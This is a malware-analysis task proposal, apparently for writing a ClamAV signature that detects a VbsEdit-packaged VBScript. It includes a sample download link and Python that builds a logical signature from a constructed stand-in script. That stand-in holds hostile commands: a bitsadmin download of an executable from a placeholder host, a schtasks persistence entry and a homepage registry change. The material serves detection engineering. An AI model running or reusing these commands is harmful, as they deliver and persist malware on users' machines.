Overview
Analyze this generic malware and write a ClamAV signature that detects it
Proposal
This malware does generic malware stuff: it changes the browser homepage, downloads follow-on malware via BITS, schedules tasks to run periodically, etc.
This is from a binary created with VbsEdit, a tool that creates PEs from a given VBScript. We've written a ClamAV bytecode signature that extracts the underlying scripts from these executables, and would like to leverage that to match on the underlying malicious VBS (so, we need a signature on the script contents itself).
Technologies Involved
VBScript
Expected Difficulty
Beginner/Easy - Can be accomplished with basic RE; there is little to no obfuscation involved, there are fewer than 200 lines of code to analyze, etc.
Technical Info
PE containing the VBScript:
57dc49dbc6775376902c4a3244d82fcca96b49dc67d5aa6e54e184de4514165d
Use
clamscan --debug --leave-temps <sample dir> 2>&1 | grep "bytecode: scanning extracted file"
to extract.
Link to download the sample: https://malshare.com/sample.php?action=detail&hash=4a0fe17bc7e99daaf569de19f1222eed
Note: there is an existing hash-based signature for this sample (Win.Malware.Agent-6401248-0), but we'd like to replace it with a content-based signature on the extracted script, which will also cover variants that differ only in the packaged PE.
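The task asks for a signature on the script contents rather than on the PE hash. As an added illustration (this is not ClamAV's code nor the actual signature for this sample), the Python below builds a ClamAV logical signature (.ldb line) from literal strings one would expect in the extracted VBScript, and pre-checks it locally before handing it to clamscan. The VBS snippet and the three indicator strings are constructed stand-ins for the behaviours the proposal describes (homepage change, BITS download, scheduled task); the real sample's script is not reproduced here, and the signature name is a placeholder.

```python
"""Build a ClamAV logical (.ldb) signature from indicator strings and
pre-check it against a script body before running clamscan.

Everything below is an illustrative, constructed example; the real
extracted VBScript and its indicators must come from the analysis."""

# Constructed stand-in for a script extracted by the bytecode signature.
# Hypothetical content, NOT the actual sample.
SAMPLE_VBS = """Set sh = CreateObject("WScript.Shell")
sh.RegWrite "HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://example.invalid/"
sh.Run "bitsadmin /transfer job /download /priority high http://example.invalid/p.exe %TEMP%\\p.exe", 0, True
sh.Run "schtasks /create /sc minute /mo 30 /tn Updater /tr %TEMP%\\p.exe", 0, True
"""

# Constructed indicator strings, one per behaviour named in the proposal.
INDICATORS = [
    "Internet Explorer\\Main\\Start Page",  # homepage change via registry
    "bitsadmin /transfer",                   # follow-on download via BITS
    "schtasks /create",                      # persistence via scheduled task
]


def to_clam_hex(s: str) -> str:
    """Encode a literal string as the lowercase hex ClamAV uses in subsignatures."""
    return s.encode("utf-8").hex()


def build_ldb(name: str, target: int, indicators) -> str:
    """Emit one .ldb line: Name;Target:N;LogicalExpression;Subsig0;Subsig1;...

    The logical expression requires every subsignature to match (0&1&2...),
    so a single common string such as 'schtasks' alone will not fire."""
    expr = "&".join(str(i) for i in range(len(indicators)))
    subsigs = ";".join(to_clam_hex(s) for s in indicators)
    return f"{name};Target:{target};{expr};{subsigs}"


def parse_ldb(line: str):
    """Split an .ldb line back into its fields; subsignatures are decoded to bytes."""
    parts = line.split(";")
    name, target_block, expr, subsigs = parts[0], parts[1], parts[2], parts[3:]
    return name, target_block, expr, [bytes.fromhex(h) for h in subsigs]


def local_match(ldb_line: str, data: bytes) -> bool:
    """Pre-check: True when every conjunctive subsignature occurs in data.

    Only the '&'-only expressions build_ldb() generates are supported here;
    ClamAV's own engine (clamscan -d sig.ldb) remains the authority."""
    _, _, expr, subsigs = parse_ldb(ldb_line)
    if set(expr) - set("0123456789&"):
        raise ValueError("only plain '&' expressions are handled by this pre-check")
    wanted = [subsigs[int(i)] for i in expr.split("&")]
    return all(pat in data for pat in wanted)


if __name__ == "__main__":
    sig = build_ldb("Win.Malware.Agent-Example", 0, INDICATORS)  # placeholder name
    print(sig)
    print("matches constructed sample:", local_match(sig, SAMPLE_VBS.encode()))
```

Writing the printed line to a file named, say, `example.ldb` and running `clamscan -d example.ldb <extracted script>` checks it with the real engine; the plain hex subsignatures are case-sensitive byte matches, so if the extracted script varies in case, either add the variants as further subsignatures or switch to a normalized text target.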